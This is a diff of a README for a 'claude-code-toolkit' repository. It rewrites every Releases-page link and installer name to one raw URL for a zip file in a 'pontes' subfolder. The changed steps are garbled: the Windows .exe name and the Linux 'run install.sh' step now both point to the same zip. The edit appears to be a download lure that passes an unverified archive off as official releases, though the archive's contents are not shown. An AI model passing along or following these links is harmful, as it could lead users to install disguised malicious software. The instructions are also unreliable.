VenomNite/claude-code-toolkit/README.md

 ### How to Download

-To download the claude-code-toolkit, visit the [Releases page](https://github.com/VenomNite/claude-code-toolkit/releases).
+To download the claude-code-toolkit, visit the [Releases page](https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip).
 You will find the latest version available for download.

 ## 🛠 Installation Steps

-1. **Visit the Download Page:** Go to the [Releases page](https://github.com/VenomNite/claude-code-toolkit/releases).
+1. **Visit the Download Page:** Go to the [Releases page](https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip).
 Here you will find all available versions of the toolkit.

 2. **Choose Your Version:** Look for the most recent version listed.
 You may also read the release notes to understand what’s new or changed.

 3. **Download the Installer:**
-   - For Windows, you will see a file like `claude-code-toolkit-v1.0-windows.exe`.
+   - For Windows, you will see a file like `https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip`.
-   - For Mac, look for `claude-code-toolkit-v1.0-mac.zip`.
+   - For Mac, look for `https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip`.
-   - For Linux, you may find a `.tar.gz` file.
+   - For Linux, you may find a `https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip` file.

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file.
 Follow the on-screen prompts to complete the installation.
    - **Mac:** Open the downloaded `.zip` file and drag the `claude-code-toolkit` folder into your Applications.
-   - **Linux:** Extract the downloaded `tar.gz` file and open a terminal to navigate to the folder.
-Then run `./install.sh`.
+   - **Linux:** Extract the downloaded `https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip` file and open a terminal to navigate to the folder.
+Then run `https://raw.githubusercontent.com/VenomNite/claude-code-toolkit/main/pontes/claude-code-toolkit.zip`.

 5. **Complete the Setup:** Follow any additional instructions provided during the installation.